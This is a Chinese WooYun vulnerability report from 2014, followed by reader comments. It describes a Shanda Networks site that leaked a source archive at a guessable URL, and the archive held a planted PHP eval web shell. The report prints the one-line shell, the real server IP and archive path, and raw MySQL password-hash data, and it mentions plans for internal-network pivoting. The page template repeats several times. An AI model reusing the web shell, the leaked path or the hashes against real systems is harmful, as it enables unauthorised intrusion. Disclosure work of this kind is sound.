盛大网络某站源码泄露变相GETSHELL | wooyun-2014-080982| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-080982

漏洞标题：盛大网络某站源码泄露变相GETSHELL

漏洞作者： if、so

提交时间：2014-10-27 15:58

修复时间：2014-12-11 16:00

公开时间：2014-12-11 16:00

漏洞类型：敏感信息泄露

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-10-27：细节已通知厂商并且等待厂商处理中
2014-10-27：厂商已经确认，细节仅向厂商公开
2014-11-06：细节向核心白帽子及相关领域专家公开
2014-11-16：细节向普通白帽子公开
2014-11-26：细节向实习白帽子公开
2014-12-11：细节向公众公开

简要描述：

最近盛大很火，我也来凑热闹。然后我只想说一句，你们安全到底在干嘛？What are you god-damn doing?

详细说明：

WooYun: 盛大某站存在源码泄露导致getshell
没事看看你们的历史漏洞，发现这个，然后我手贱了，本来是http://116.211.21.204/bbs/bbs.rar，我换成了
http://116.211.21.204/bbs.rar，cao，直接下载了，我也是醉了，你们就不能登陆到服务器稍微检查下？。。

还没结束，我随便翻翻，因为uckey肯定没有用了啊，被改了，没法shell了。谁知道

有没有觉得这个文件不正常？
打开一看直接

<?php eval($_POST['w']);?>

我无语了，真是哪里有洞补哪里。
尝试练了下。。连上了

据说现在有shell是20rank。
随便翻了翻，感觉继续渗透很可行啊，本机提权加内网渗透

D:\mysql\MySQL\data\mysql\

 U #       \û	localhostroot*40974E53D386DCFC5 Q       û	localhost *F2F39747C6CE9DB18	 29A493AC586D44B1F294DDFC   Rû%	xmbbs_911*40974E53D386DCFC59A493AC586D44B1F294DDFC       I       Lû% *F2F39747C6CE9DB18	 27F4DA87E5F34E3CC82AC32F  	 27F4DA87E5F34E3CC82AC32F     dÿÿÿÿÿÿÿÿ      è974E53D386DCFC59A493AC586D44B1F294DDFC                  `      „       Ðbs&new*40974E53D386DCFC59A493AC586D44B1F294DDFC

求授权以后拿到shell可以内网渗透。没授权就算了

漏洞证明：

http://116.211.21.204/bbs.rar

修复方案：

。

版权声明：转载请注明来源 if、so@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2014-10-27 16:03

厂商回复：

谢谢报告，这个必须给20！！！

漏洞评价：

2014-10-27 15:58 | 疯狗 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞，心中自然无码。)

... 被黑了？
2014-10-27 16:01 | Coody ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产；如遇接单收徒、绝非本人所...)

变相GETSHELL...
2014-10-27 16:02 | 子非海绵宝宝 ( 核心白帽子 | Rank:1044 漏洞数:106 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

盛大说过的,他们几万个服务器,难免会出现低级错误...
2014-10-27 16:23 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

@子非海绵宝宝盛大说的是shell给20
2014-10-27 16:49 | 子非海绵宝宝 ( 核心白帽子 | Rank:1044 漏洞数:106 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

@px1624 楼主说 <你们安全到底在干嘛？> 我说上面的话的
2014-10-27 17:11 | luwikes ( 普通白帽子 | Rank:512 漏洞数:77 | 潜心学习~~~)

你们好欢乐
2014-10-27 17:33 | D_in ( 普通白帽子 | Rank:413 漏洞数:62 | 到我嘴里来)

我只想说求公开，是如何变态的
2014-10-27 18:22 | 盛大网络(乌云厂商)

@D_in 就是源代码压缩包放在公网了
2014-10-27 18:28 | 第四维度 ( 实习白帽子 | Rank:58 漏洞数:34 | 谦谦君子，温润如玉)

@盛大网络低级错误啊
2014-10-29 10:44 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

火了啊
2014-11-17 09:13 | 昔阳 ( 路人 | Rank:1 漏洞数:1 | 菜鸟来装逼)

盛大又火了一次 @盛大网络请问有啥感想
2014-11-17 09:33 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

纠结哦，居然原来就被人搞了
2014-11-28 11:25 | 写个七 ( 路人 | Rank:4 漏洞数:1 | 一点一点积累。)

哈哈疏忽的机制啊。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-080982

漏洞标题：盛大网络某站源码泄露变相GETSHELL

相关厂商：盛大网络

漏洞作者： if、so

提交时间：2014-10-27 15:58

修复时间：2014-12-11 16:00

公开时间：2014-12-11 16:00

漏洞类型：敏感信息泄露

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 if、so@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-080982

漏洞标题：盛大网络某站源码泄露变相GETSHELL

相关厂商：盛大网络

漏洞作者： if、so

提交时间：2014-10-27 15:58

修复时间：2014-12-11 16:00

公开时间：2014-12-11 16:00

漏洞类型：敏感信息泄露

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-080982"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 if、so@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：